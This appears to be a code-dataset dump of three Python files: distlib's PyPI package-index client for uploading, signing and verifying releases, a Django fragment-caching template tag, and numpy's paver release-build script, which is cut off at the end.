repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
nitin-cherian/Webapps | TalkPython/P4E/my_web_app/.env/lib/python3.5/site-packages/pip/_vendor/distlib/index.py | 328 | 21085 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = 'https://pypi.python.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
    """
    This class represents a package index compatible with PyPI, the Python
    Package Index.
    """
    # MIME multipart boundary used by encode_request() when posting forms.
    boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'

    def __init__(self, url=None):
        """
        Initialise an instance.

        :param url: The URL of the index. If not specified, the URL for PyPI is
                    used.
        """
        self.url = url or DEFAULT_INDEX
        self.read_configuration()
        scheme, netloc, path, params, query, frag = urlparse(self.url)
        # Only plain http(s) URLs without params/query/fragment are accepted.
        if params or query or frag or scheme not in ('http', 'https'):
            raise DistlibException('invalid repository: %s' % self.url)
        self.password_handler = None
        self.ssl_verifier = None
        self.gpg = None
        self.gpg_home = None
        self.rpc_proxy = None
        # Probe for an available GnuPG executable, discarding its output.
        with open(os.devnull, 'w') as sink:
            # Use gpg by default rather than gpg2, as gpg2 insists on
            # prompting for passwords
            for s in ('gpg', 'gpg2'):
                try:
                    rc = subprocess.check_call([s, '--version'], stdout=sink,
                                               stderr=sink)
                    if rc == 0:
                        self.gpg = s
                        break
                except OSError:
                    # Executable not on PATH - try the next candidate.
                    pass

    def _get_pypirc_command(self):
        """
        Get the distutils command for interacting with PyPI configurations.
        :return: the command.
        """
        from distutils.core import Distribution
        from distutils.config import PyPIRCCommand
        d = Distribution()
        return PyPIRCCommand(d)

    def read_configuration(self):
        """
        Read the PyPI access configuration as supported by distutils, getting
        PyPI to do the actual work. This populates ``username``, ``password``,
        ``realm`` and ``url`` attributes from the configuration.
        """
        # get distutils to do the work
        c = self._get_pypirc_command()
        c.repository = self.url
        cfg = c._read_pypirc()
        self.username = cfg.get('username')
        self.password = cfg.get('password')
        self.realm = cfg.get('realm', 'pypi')
        self.url = cfg.get('repository', self.url)

    def save_configuration(self):
        """
        Save the PyPI access configuration. You must have set ``username`` and
        ``password`` attributes before calling this method.

        Again, distutils is used to do the actual work.
        """
        self.check_credentials()
        # get distutils to do the work
        c = self._get_pypirc_command()
        c._store_pypirc(self.username, self.password)

    def check_credentials(self):
        """
        Check that ``username`` and ``password`` have been set, and raise an
        exception if not.
        """
        if self.username is None or self.password is None:
            raise DistlibException('username and password must be set')
        # Install a basic-auth handler for subsequent send_request() calls.
        pm = HTTPPasswordMgr()
        _, netloc, _, _, _, _ = urlparse(self.url)
        pm.add_password(self.realm, netloc, self.username, self.password)
        self.password_handler = HTTPBasicAuthHandler(pm)

    def register(self, metadata):
        """
        Register a distribution on PyPI, using the provided metadata.

        :param metadata: A :class:`Metadata` instance defining at least a name
                         and version number for the distribution to be
                         registered.
        :return: The HTTP response received from PyPI upon submission of the
                 request.
        """
        self.check_credentials()
        metadata.validate()
        d = metadata.todict()
        # First ask the index to verify the metadata, then actually submit it.
        d[':action'] = 'verify'
        request = self.encode_request(d.items(), [])
        response = self.send_request(request)
        d[':action'] = 'submit'
        request = self.encode_request(d.items(), [])
        return self.send_request(request)

    def _reader(self, name, stream, outbuf):
        """
        Thread runner for reading lines of from a subprocess into a buffer.

        :param name: The logical name of the stream (used for logging only).
        :param stream: The stream to read from. This will typically a pipe
                       connected to the output stream of a subprocess.
        :param outbuf: The list to append the read lines to.
        """
        while True:
            s = stream.readline()
            if not s:
                break
            s = s.decode('utf-8').rstrip()
            outbuf.append(s)
            logger.debug('%s: %s' % (name, s))
        stream.close()

    def get_sign_command(self, filename, signer, sign_password,
                         keystore=None):
        """
        Return a suitable command for signing a file.

        :param filename: The pathname to the file to be signed.
        :param signer: The identifier of the signer of the file.
        :param sign_password: The passphrase for the signer's
                              private key used for signing.
        :param keystore: The path to a directory which contains the keys
                         used in verification. If not specified, the
                         instance's ``gpg_home`` attribute is used instead.
        :return: The signing command as a list suitable to be
                 passed to :class:`subprocess.Popen`.
        """
        cmd = [self.gpg, '--status-fd', '2', '--no-tty']
        if keystore is None:
            keystore = self.gpg_home
        if keystore:
            cmd.extend(['--homedir', keystore])
        if sign_password is not None:
            # Passphrase will be fed on stdin (fd 0) by run_command().
            cmd.extend(['--batch', '--passphrase-fd', '0'])
        # The signature is written to a temporary directory; the caller is
        # responsible for cleaning it up (see upload_file()).
        td = tempfile.mkdtemp()
        sf = os.path.join(td, os.path.basename(filename) + '.asc')
        cmd.extend(['--detach-sign', '--armor', '--local-user',
                    signer, '--output', sf, filename])
        logger.debug('invoking: %s', ' '.join(cmd))
        return cmd, sf

    def run_command(self, cmd, input_data=None):
        """
        Run a command in a child process , passing it any input data specified.

        :param cmd: The command to run.
        :param input_data: If specified, this must be a byte string containing
                           data to be sent to the child process.
        :return: A tuple consisting of the subprocess' exit code, a list of
                 lines read from the subprocess' ``stdout``, and a list of
                 lines read from the subprocess' ``stderr``.
        """
        kwargs = {
            'stdout': subprocess.PIPE,
            'stderr': subprocess.PIPE,
        }
        if input_data is not None:
            kwargs['stdin'] = subprocess.PIPE
        stdout = []
        stderr = []
        p = subprocess.Popen(cmd, **kwargs)
        # We don't use communicate() here because we may need to
        # get clever with interacting with the command
        t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
        t1.start()
        t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
        t2.start()
        if input_data is not None:
            p.stdin.write(input_data)
            p.stdin.close()
        p.wait()
        # Ensure both reader threads have drained their pipes before
        # returning the collected output.
        t1.join()
        t2.join()
        return p.returncode, stdout, stderr

    def sign_file(self, filename, signer, sign_password, keystore=None):
        """
        Sign a file.

        :param filename: The pathname to the file to be signed.
        :param signer: The identifier of the signer of the file.
        :param sign_password: The passphrase for the signer's
                              private key used for signing.
        :param keystore: The path to a directory which contains the keys
                         used in signing. If not specified, the instance's
                         ``gpg_home`` attribute is used instead.
        :return: The absolute pathname of the file where the signature is
                 stored.
        """
        cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
                                              keystore)
        rc, stdout, stderr = self.run_command(cmd,
                                              sign_password.encode('utf-8'))
        if rc != 0:
            raise DistlibException('sign command failed with error '
                                   'code %s' % rc)
        return sig_file

    def upload_file(self, metadata, filename, signer=None, sign_password=None,
                    filetype='sdist', pyversion='source', keystore=None):
        """
        Upload a release file to the index.

        :param metadata: A :class:`Metadata` instance defining at least a name
                         and version number for the file to be uploaded.
        :param filename: The pathname of the file to be uploaded.
        :param signer: The identifier of the signer of the file.
        :param sign_password: The passphrase for the signer's
                              private key used for signing.
        :param filetype: The type of the file being uploaded. This is the
                         distutils command which produced that file, e.g.
                         ``sdist`` or ``bdist_wheel``.
        :param pyversion: The version of Python which the release relates
                          to. For code compatible with any Python, this would
                          be ``source``, otherwise it would be e.g. ``3.2``.
        :param keystore: The path to a directory which contains the keys
                         used in signing. If not specified, the instance's
                         ``gpg_home`` attribute is used instead.
        :return: The HTTP response received from PyPI upon submission of the
                 request.
        """
        self.check_credentials()
        if not os.path.exists(filename):
            raise DistlibException('not found: %s' % filename)
        metadata.validate()
        d = metadata.todict()
        sig_file = None
        if signer:
            if not self.gpg:
                logger.warning('no signing program available - not signed')
            else:
                sig_file = self.sign_file(filename, signer, sign_password,
                                          keystore)
        with open(filename, 'rb') as f:
            file_data = f.read()
        # Both digests are sent so the index can verify the upload.
        md5_digest = hashlib.md5(file_data).hexdigest()
        sha256_digest = hashlib.sha256(file_data).hexdigest()
        d.update({
            ':action': 'file_upload',
            'protocol_version': '1',
            'filetype': filetype,
            'pyversion': pyversion,
            'md5_digest': md5_digest,
            'sha256_digest': sha256_digest,
        })
        files = [('content', os.path.basename(filename), file_data)]
        if sig_file:
            with open(sig_file, 'rb') as f:
                sig_data = f.read()
            files.append(('gpg_signature', os.path.basename(sig_file),
                          sig_data))
            # Remove the temporary directory created by get_sign_command().
            shutil.rmtree(os.path.dirname(sig_file))
        request = self.encode_request(d.items(), files)
        return self.send_request(request)

    def upload_documentation(self, metadata, doc_dir):
        """
        Upload documentation to the index.

        :param metadata: A :class:`Metadata` instance defining at least a name
                         and version number for the documentation to be
                         uploaded.
        :param doc_dir: The pathname of the directory which contains the
                        documentation. This should be the directory that
                        contains the ``index.html`` for the documentation.
        :return: The HTTP response received from PyPI upon submission of the
                 request.
        """
        self.check_credentials()
        if not os.path.isdir(doc_dir):
            raise DistlibException('not a directory: %r' % doc_dir)
        fn = os.path.join(doc_dir, 'index.html')
        if not os.path.exists(fn):
            raise DistlibException('not found: %r' % fn)
        metadata.validate()
        name, version = metadata.name, metadata.version
        # The whole doc tree is zipped in memory and posted as one file.
        zip_data = zip_dir(doc_dir).getvalue()
        fields = [(':action', 'doc_upload'),
                  ('name', name), ('version', version)]
        files = [('content', name, zip_data)]
        request = self.encode_request(fields, files)
        return self.send_request(request)

    def get_verify_command(self, signature_filename, data_filename,
                           keystore=None):
        """
        Return a suitable command for verifying a file.

        :param signature_filename: The pathname to the file containing the
                                   signature.
        :param data_filename: The pathname to the file containing the
                              signed data.
        :param keystore: The path to a directory which contains the keys
                         used in verification. If not specified, the
                         instance's ``gpg_home`` attribute is used instead.
        :return: The verifying command as a list suitable to be
                 passed to :class:`subprocess.Popen`.
        """
        cmd = [self.gpg, '--status-fd', '2', '--no-tty']
        if keystore is None:
            keystore = self.gpg_home
        if keystore:
            cmd.extend(['--homedir', keystore])
        cmd.extend(['--verify', signature_filename, data_filename])
        logger.debug('invoking: %s', ' '.join(cmd))
        return cmd

    def verify_signature(self, signature_filename, data_filename,
                         keystore=None):
        """
        Verify a signature for a file.

        :param signature_filename: The pathname to the file containing the
                                   signature.
        :param data_filename: The pathname to the file containing the
                              signed data.
        :param keystore: The path to a directory which contains the keys
                         used in verification. If not specified, the
                         instance's ``gpg_home`` attribute is used instead.
        :return: True if the signature was verified, else False.
        """
        if not self.gpg:
            raise DistlibException('verification unavailable because gpg '
                                   'unavailable')
        cmd = self.get_verify_command(signature_filename, data_filename,
                                      keystore)
        rc, stdout, stderr = self.run_command(cmd)
        # gpg exits 1 for a bad signature; anything else is a hard failure.
        if rc not in (0, 1):
            raise DistlibException('verify command failed with error '
                                   'code %s' % rc)
        return rc == 0

    def download_file(self, url, destfile, digest=None, reporthook=None):
        """
        This is a convenience method for downloading a file from an URL.
        Normally, this will be a file from the index, though currently
        no check is made for this (i.e. a file can be downloaded from
        anywhere).

        The method is just like the :func:`urlretrieve` function in the
        standard library, except that it allows digest computation to be
        done during download and checking that the downloaded data
        matched any expected value.

        :param url: The URL of the file to be downloaded (assumed to be
                    available via an HTTP GET request).
        :param destfile: The pathname where the downloaded file is to be
                         saved.
        :param digest: If specified, this must be a (hasher, value)
                       tuple, where hasher is the algorithm used (e.g.
                       ``'md5'``) and ``value`` is the expected value.
        :param reporthook: The same as for :func:`urlretrieve` in the
                           standard library.
        """
        if digest is None:
            digester = None
            logger.debug('No digest specified')
        else:
            if isinstance(digest, (list, tuple)):
                hasher, digest = digest
            else:
                # A bare digest string defaults to md5.
                hasher = 'md5'
            digester = getattr(hashlib, hasher)()
            logger.debug('Digest specified: %s' % digest)
        # The following code is equivalent to urlretrieve.
        # We need to do it this way so that we can compute the
        # digest of the file as we go.
        with open(destfile, 'wb') as dfp:
            # addinfourl is not a context manager on 2.x
            # so we have to use try/finally
            sfp = self.send_request(Request(url))
            try:
                headers = sfp.info()
                blocksize = 8192
                size = -1
                read = 0
                blocknum = 0
                if "content-length" in headers:
                    size = int(headers["Content-Length"])
                if reporthook:
                    reporthook(blocknum, blocksize, size)
                while True:
                    block = sfp.read(blocksize)
                    if not block:
                        break
                    read += len(block)
                    dfp.write(block)
                    if digester:
                        digester.update(block)
                    blocknum += 1
                    if reporthook:
                        reporthook(blocknum, blocksize, size)
            finally:
                sfp.close()
        # check that we got the whole file, if we can
        if size >= 0 and read < size:
            raise DistlibException(
                'retrieval incomplete: got only %d out of %d bytes'
                % (read, size))
        # if we have a digest, it must match.
        if digester:
            actual = digester.hexdigest()
            if digest != actual:
                raise DistlibException('%s digest mismatch for %s: expected '
                                       '%s, got %s' % (hasher, destfile,
                                                       digest, actual))
            logger.debug('Digest verified: %s', digest)

    def send_request(self, req):
        """
        Send a standard library :class:`Request` to PyPI and return its
        response.

        :param req: The request to send.
        :return: The HTTP response from PyPI (a standard library HTTPResponse).
        """
        handlers = []
        if self.password_handler:
            handlers.append(self.password_handler)
        if self.ssl_verifier:
            handlers.append(self.ssl_verifier)
        opener = build_opener(*handlers)
        return opener.open(req)

    def encode_request(self, fields, files):
        """
        Encode fields and files for posting to an HTTP server.

        :param fields: The fields to send as a list of (fieldname, value)
                       tuples.
        :param files: The files to send as a list of (fieldname, filename,
                      file_bytes) tuple.
        """
        # Adapted from packaging, which in turn was adapted from
        # http://code.activestate.com/recipes/146306
        parts = []
        boundary = self.boundary
        for k, values in fields:
            if not isinstance(values, (list, tuple)):
                values = [values]
            for v in values:
                parts.extend((
                    b'--' + boundary,
                    ('Content-Disposition: form-data; name="%s"' %
                     k).encode('utf-8'),
                    b'',
                    v.encode('utf-8')))
        for key, filename, value in files:
            parts.extend((
                b'--' + boundary,
                ('Content-Disposition: form-data; name="%s"; filename="%s"' %
                 (key, filename)).encode('utf-8'),
                b'',
                value))
        # Closing boundary plus a trailing CRLF.
        parts.extend((b'--' + boundary + b'--', b''))
        body = b'\r\n'.join(parts)
        ct = b'multipart/form-data; boundary=' + boundary
        headers = {
            'Content-type': ct,
            'Content-length': str(len(body))
        }
        return Request(self.url, body, headers)

    def search(self, terms, operator=None):
        """
        Search the index via its XML-RPC interface.

        :param terms: Either a string (searched as a name) or a dict of
                      field -> value terms.
        :param operator: 'and' or 'or'; defaults to 'and' when not given.
        :return: Whatever the XML-RPC ``search`` call returns.
        """
        if isinstance(terms, string_types):
            terms = {'name': terms}
        if self.rpc_proxy is None:
            # Lazily create (and then reuse) the XML-RPC proxy.
            self.rpc_proxy = ServerProxy(self.url, timeout=3.0)
        return self.rpc_proxy.search(terms, operator or 'and')
| mit |
ProfessionalIT/maxigenios-website | sdk/google_appengine/google/appengine/_internal/django/templatetags/cache.py | 23 | 2568 | from google.appengine._internal.django.template import Library, Node, TemplateSyntaxError, Variable, VariableDoesNotExist
from google.appengine._internal.django.template import resolve_variable
from google.appengine._internal.django.core.cache import cache
from google.appengine._internal.django.utils.encoding import force_unicode
from google.appengine._internal.django.utils.http import urlquote
from google.appengine._internal.django.utils.hashcompat import md5_constructor
register = Library()
class CacheNode(Node):
    """Template node that renders its children once and caches the result."""

    def __init__(self, nodelist, expire_time_var, fragment_name, vary_on):
        self.nodelist = nodelist
        # Resolved lazily at render time so the timeout may be a variable.
        self.expire_time_var = Variable(expire_time_var)
        self.fragment_name = fragment_name
        self.vary_on = vary_on

    def render(self, context):
        """Return the cached fragment, rendering and storing it on a miss."""
        try:
            expire_time = self.expire_time_var.resolve(context)
        except VariableDoesNotExist:
            raise TemplateSyntaxError('"cache" tag got an unknown variable: %r' % self.expire_time_var.var)
        try:
            expire_time = int(expire_time)
        except (ValueError, TypeError):
            raise TemplateSyntaxError('"cache" tag got a non-integer timeout value: %r' % expire_time)
        # Build a unicode key for this fragment and all vary-on's.
        args = md5_constructor(u':'.join([urlquote(resolve_variable(var, context)) for var in self.vary_on]))
        cache_key = 'template.cache.%s.%s' % (self.fragment_name, args.hexdigest())
        value = cache.get(cache_key)
        if value is None:
            # Cache miss: render the wrapped nodes and store the result.
            value = self.nodelist.render(context)
            cache.set(cache_key, value, expire_time)
        return value
def do_cache(parser, token):
    """
    This will cache the contents of a template fragment for a given amount
    of time.

    Usage::

        {% load cache %}
        {% cache [expire_time] [fragment_name] %}
            .. some expensive processing ..
        {% endcache %}

    This tag also supports varying by a list of arguments::

        {% load cache %}
        {% cache [expire_time] [fragment_name] [var1] [var2] .. %}
            .. some expensive processing ..
        {% endcache %}

    Each unique set of arguments will result in a unique cache entry.
    """
    nodelist = parser.parse(('endcache',))
    parser.delete_first_token()
    tokens = token.contents.split()
    # tokens[0] is the tag name itself, so at least an expire_time and a
    # fragment_name must follow it.
    if len(tokens) < 3:
        raise TemplateSyntaxError(u"'%r' tag requires at least 2 arguments." % tokens[0])
    return CacheNode(nodelist, tokens[1], tokens[2], tokens[3:])

register.tag('cache', do_cache)
| mit |
skwbc/numpy | pavement.py | 9 | 21849 | """
This paver file is intended to help with the release process as much as
possible. It relies on virtualenv to generate 'bootstrap' environments as
independent from the user system as possible (e.g. to make sure the sphinx doc
is built against the built numpy, not an installed one).
Building a fancy dmg from scratch
=================================
Clone the numpy-macosx-installer git repo from on github into the source tree
(numpy-macosx-installer should be in the same directory as setup.py). Then, do
as follows::
git clone git://github.com/cournape/macosx-numpy-installer
# remove build dir, and everything generated by previous paver calls
# (included generated installers). Use with care !
paver nuke
paver bootstrap && source bootstrap/bin/activate
# Installing numpy is necessary to build the correct documentation (because
# of autodoc)
python setup.py install
paver dmg
Building a simple (no-superpack) windows installer from wine
============================================================
It assumes that blas/lapack are in c:\local\lib inside drive_c.
paver bdist_wininst_simple
You will have to configure your wine python locations (WINE_PYS).
The superpack requires all the atlas libraries for every arch to be installed
(see SITECFG), and can then be built as follows::
paver bdist_superpack
Building changelog + notes
==========================
Assumes you have git and the binaries/tarballs in installers/::
paver write_release
paver write_note
This automatically put the checksum into NOTES.txt, and write the Changelog
which can be uploaded to sourceforge.
TODO
====
- the script is messy, lots of global variables
- make it more easily customizable (through command line args)
- missing targets: install & test, sdist test, debian packaging
- fix bdist_mpkg: we build the same source twice -> how to make sure we use
the same underlying python for egg install in venv and for bdist_mpkg
"""
from __future__ import division, print_function
# What need to be installed to build everything on mac os x:
# - wine: python 2.6 and 2.5 + makensis + cpuid plugin + mingw, all in the PATH
# - paver + virtualenv
# - full texlive
import os
import sys
import shutil
import subprocess
import re
try:
from hashlib import md5
from hashlib import sha256
except ImportError:
from md5 import md5
import paver
from paver.easy import \
options, Bunch, task, call_task, sh, needs, cmdopts, dry
# Import the adjacent setup.py to derive the full version string, including
# the git revision for unreleased builds.
sys.path.insert(0, os.path.dirname(__file__))
try:
    setup_py = __import__("setup")
    FULLVERSION = setup_py.VERSION
    # This is duplicated from setup.py
    if os.path.exists('.git'):
        GIT_REVISION = setup_py.git_version()
    elif os.path.exists('numpy/version.py'):
        # must be a source distribution, use existing version file
        from numpy.version import git_revision as GIT_REVISION
    else:
        GIT_REVISION = "Unknown"
    if not setup_py.ISRELEASED:
        FULLVERSION += '.dev0+' + GIT_REVISION[:7]
finally:
    # Always restore sys.path, even if importing setup.py failed.
    sys.path.pop(0)
#-----------------------------------
# Things to be changed for a release
#-----------------------------------

# Source of the release notes
RELEASE_NOTES = 'doc/release/1.12.0-notes.rst'

# Start/end of the log (from git)
LOG_START = 'maintenance/1.11.x'
LOG_END = 'master'


#-------------------------------------------------------
# Hardcoded build/install dirs, virtualenv options, etc.
#-------------------------------------------------------
DEFAULT_PYTHON = "2.7"

# Where to put the final installers, as put on sourceforge
SUPERPACK_BUILD = 'build-superpack'
SUPERPACK_BINDIR = os.path.join(SUPERPACK_BUILD, 'binaries')

# Paver option bunches shared by the tasks defined below.
options(bootstrap=Bunch(bootstrap_dir="bootstrap"),
        virtualenv=Bunch(packages_to_install=["sphinx==1.1.3", "numpydoc"],
                         no_site_packages=False),
        sphinx=Bunch(builddir="build", sourcedir="source", docroot='doc'),
        superpack=Bunch(builddir="build-superpack"),
        installers=Bunch(releasedir="release",
                         installersdir=os.path.join("release", "installers")),
        doc=Bunch(doc_root="doc",
                  sdir=os.path.join("doc", "source"),
                  bdir=os.path.join("doc", "build"),
                  bdir_latex=os.path.join("doc", "build", "latex"),
                  destdir_pdf=os.path.join("build_doc", "pdf")
                  ),
        html=Bunch(builddir=os.path.join("build", "html")),
        dmg=Bunch(python_version=DEFAULT_PYTHON),
        bdist_wininst_simple=Bunch(python_version=DEFAULT_PYTHON),
        )

# python.org framework interpreters used for the OS X mpkg builds.
MPKG_PYTHON = {
    "2.6": ["/Library/Frameworks/Python.framework/Versions/2.6/bin/python"],
    "2.7": ["/Library/Frameworks/Python.framework/Versions/2.7/bin/python"],
    "3.2": ["/Library/Frameworks/Python.framework/Versions/3.2/bin/python3"],
    "3.3": ["/Library/Frameworks/Python.framework/Versions/3.3/bin/python3"],
    "3.4": ["/Library/Frameworks/Python.framework/Versions/3.4/bin/python3"],
}

# ATLAS/BLAS/LAPACK locations per SSE level (paths inside the wine prefix).
SSE3_CFG = {'ATLAS': r'C:\local\lib\atlas\sse3'}
SSE2_CFG = {'ATLAS': r'C:\local\lib\atlas\sse2'}
NOSSE_CFG = {'BLAS': r'C:\local\lib\atlas\nosse', 'LAPACK': r'C:\local\lib\atlas\nosse'}
SITECFG = {"sse2" : SSE2_CFG, "sse3" : SSE3_CFG, "nosse" : NOSSE_CFG}

# Select the Windows Python interpreters / NSIS invocation per host platform
# (native on win32, via wine elsewhere).
if sys.platform =="darwin":
    WINDOWS_PYTHON = {
        "3.4": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python34/python.exe"],
        "3.3": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python33/python.exe"],
        "3.2": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python32/python.exe"],
        "2.7": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python27/python.exe"],
        "2.6": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python26/python.exe"],
    }
    WINDOWS_ENV = os.environ
    WINDOWS_ENV["DYLD_FALLBACK_LIBRARY_PATH"] = "/usr/X11/lib:/usr/lib"
    MAKENSIS = ["wine", "makensis"]
elif sys.platform == "win32":
    WINDOWS_PYTHON = {
        "3.4": ["C:\Python34\python.exe"],
        "3.3": ["C:\Python33\python.exe"],
        "3.2": ["C:\Python32\python.exe"],
        "2.7": ["C:\Python27\python.exe"],
        "2.6": ["C:\Python26\python.exe"],
    }
    # XXX: find out which env variable is necessary to avoid the pb with python
    # 2.6 and random module when importing tempfile
    WINDOWS_ENV = os.environ
    MAKENSIS = ["makensis"]
else:
    WINDOWS_PYTHON = {
        "3.4": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python34/python.exe"],
        "3.3": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python33/python.exe"],
        "3.2": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python32/python.exe"],
        "2.7": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python27/python.exe"],
        "2.6": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python26/python.exe"],
    }
    WINDOWS_ENV = os.environ
    MAKENSIS = ["wine", "makensis"]
#-------------------
# Windows installers
#-------------------
def superpack_name(pyver, numver):
    """Return the filename of the superpack installer."""
    return 'numpy-{0}-win32-superpack-python{1}.exe'.format(numver, pyver)
def internal_wininst_name(arch):
    """Return the name of the wininst as it will be inside the superpack
    (i.e. with the arch encoded)."""
    return "numpy-{0}-{1}.exe".format(FULLVERSION, arch)
def wininst_name(pyver):
    """Return the name of the installer built by wininst command."""
    return "numpy-{0}.win32-py{1}.exe".format(FULLVERSION, pyver)
def prepare_nsis_script(pyver, numver):
    """Instantiate the NSIS superpack installer script from its template.

    Reads the ``.nsi.in`` template, substitutes the installer name and the
    per-arch wininst binary names, and writes the result into
    ``SUPERPACK_BUILD``.

    :param pyver: Python version string (e.g. "2.7").
    :param numver: numpy version string used in the installer name.
    """
    if not os.path.exists(SUPERPACK_BUILD):
        os.makedirs(SUPERPACK_BUILD)
    tpl = os.path.join('tools/win32build/nsis_scripts', 'numpy-superinstaller.nsi.in')
    installer_name = superpack_name(pyver, numver)
    # Use context managers: the original opened both files and never
    # closed them, leaking the handles (and risking an unflushed target
    # on interpreters without refcounting).
    with open(tpl, 'r') as source:
        cnt = source.read()
    cnt = cnt.replace('@NUMPY_INSTALLER_NAME@', installer_name)
    for arch in ['nosse', 'sse2', 'sse3']:
        cnt = cnt.replace('@%s_BINARY@' % arch.upper(),
                          internal_wininst_name(arch))
    with open(os.path.join(SUPERPACK_BUILD, 'numpy-superinstaller.nsi'), 'w') as target:
        target.write(cnt)
def bdist_wininst_arch(pyver, arch):
    """Arch specific wininst build."""
    # Start from a clean build tree so stale objects compiled for another
    # arch cannot leak into this installer.
    if os.path.exists("build"):
        shutil.rmtree("build")
    _bdist_wininst(pyver, SITECFG[arch])
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_superpack(options):
    """Build all arch specific wininst installers."""
    pyver = options.python_version
    def copy_bdist(arch):
        # Copy the wininst in dist into the release directory
        source = os.path.join('dist', wininst_name(pyver))
        target = os.path.join(SUPERPACK_BINDIR, internal_wininst_name(arch))
        if os.path.exists(target):
            os.remove(target)
        if not os.path.exists(os.path.dirname(target)):
            os.makedirs(os.path.dirname(target))
        try:
            os.rename(source, target)
        except OSError:
            # When git is installed on OS X but not under Wine, the name of the
            # .exe has "-Unknown" in it instead of the correct git revision.
            # Try to fix this here:
            revidx = source.index(".dev-") + 5
            gitrev = source[revidx:revidx+7]
            os.rename(source.replace(gitrev, "Unknown"), target)
    bdist_wininst_arch(pyver, 'nosse')
    copy_bdist("nosse")
    bdist_wininst_arch(pyver, 'sse2')
    copy_bdist("sse2")
    bdist_wininst_arch(pyver, 'sse3')
    copy_bdist("sse3")
    idirs = options.installers.installersdir
    # NOTE(review): redundant re-assignment - pyver was already set above
    # and options.python_version has not changed.
    pyver = options.python_version
    prepare_nsis_script(pyver, FULLVERSION)
    subprocess.check_call(MAKENSIS + ['numpy-superinstaller.nsi'],
                          cwd=SUPERPACK_BUILD)
    # Copy the superpack into installers dir
    if not os.path.exists(idirs):
        os.makedirs(idirs)
    source = os.path.join(SUPERPACK_BUILD, superpack_name(pyver, FULLVERSION))
    target = os.path.join(idirs, superpack_name(pyver, FULLVERSION))
    shutil.copy(source, target)
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_nosse(options):
    """Build the nosse wininst installer."""
    # Plain BLAS/LAPACK build, no SSE instructions assumed.
    bdist_wininst_arch(options.python_version, 'nosse')
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_sse2(options):
    """Build the sse2 wininst installer."""
    # Uses the SSE2 ATLAS libraries from SITECFG.
    bdist_wininst_arch(options.python_version, 'sse2')
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_sse3(options):
    """Build the sse3 wininst installer."""
    # Uses the SSE3 ATLAS libraries from SITECFG.
    bdist_wininst_arch(options.python_version, 'sse3')
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_simple():
    """Simple wininst-based installer."""
    # Reads its option from the global paver `options` bunch rather than
    # taking an `options` parameter like the sibling tasks.
    pyver = options.bdist_wininst_simple.python_version
    _bdist_wininst(pyver)
def _bdist_wininst(pyver, cfg_env=None):
    """Run ``setup.py bdist_wininst`` under the configured Windows Python.

    :param pyver: key into ``WINDOWS_PYTHON`` selecting the interpreter
        (native on win32, wine elsewhere).
    :param cfg_env: optional dict of extra environment variables (e.g. the
        ATLAS/BLAS paths from ``SITECFG``); overlaid on ``WINDOWS_ENV``.
    """
    cmd = WINDOWS_PYTHON[pyver] + ['setup.py', 'build', '-c', 'mingw32', 'bdist_wininst']
    if cfg_env:
        # Merge into a fresh copy. The original code copied WINDOWS_ENV
        # *into* the caller's dict, which (a) permanently mutated the
        # module-level SITECFG entries passed in by bdist_wininst_arch and
        # (b) let any ambient ATLAS/BLAS/LAPACK environment variables
        # silently clobber the site configuration being requested.
        env = dict(WINDOWS_ENV)
        env.update(cfg_env)
    else:
        env = WINDOWS_ENV
    subprocess.check_call(cmd, env=env)
#----------------
# Bootstrap stuff
#----------------
@task
def bootstrap(options):
    """create virtualenv in ./bootstrap"""
    try:
        import virtualenv
    except ImportError as e:
        raise RuntimeError("virtualenv is needed for bootstrap")
    bdir = options.bootstrap_dir
    if not os.path.exists(bdir):
        os.makedirs(bdir)
    # NOTE(review): "boostrap.py" is a long-standing misspelling of
    # "bootstrap.py", but it is consistent with the sh() invocation below,
    # so behavior is unaffected.
    bscript = "boostrap.py"
    options.virtualenv.script_name = os.path.join(options.bootstrap_dir,
                                                  bscript)
    options.virtualenv.no_site_packages = False
    options.bootstrap.no_site_packages = False
    call_task('paver.virtual.bootstrap')
    # Execute the generated bootstrap script with the current interpreter.
    sh('cd %s; %s %s' % (bdir, sys.executable, bscript))
@task
def clean():
    """Remove build, dist, egg-info garbage."""
    d = ['build', 'dist', 'numpy.egg-info']
    for i in d:
        if os.path.exists(i):
            shutil.rmtree(i)
    # Also drop the sphinx build directory under doc/.
    bdir = os.path.join('doc', options.sphinx.builddir)
    if os.path.exists(bdir):
        shutil.rmtree(bdir)
@task
def clean_bootstrap():
    """Remove the virtualenv bootstrap directory."""
    bdir = os.path.join(options.bootstrap.bootstrap_dir)
    if os.path.exists(bdir):
        shutil.rmtree(bdir)
@task
@needs('clean', 'clean_bootstrap')
def nuke(options):
    """Remove everything: build dir, installers, bootstrap dirs, etc..."""
    # 'clean' and 'clean_bootstrap' have already run via @needs; finish by
    # removing the superpack build dir and the release dir.
    for d in [options.superpack.builddir, options.installers.releasedir]:
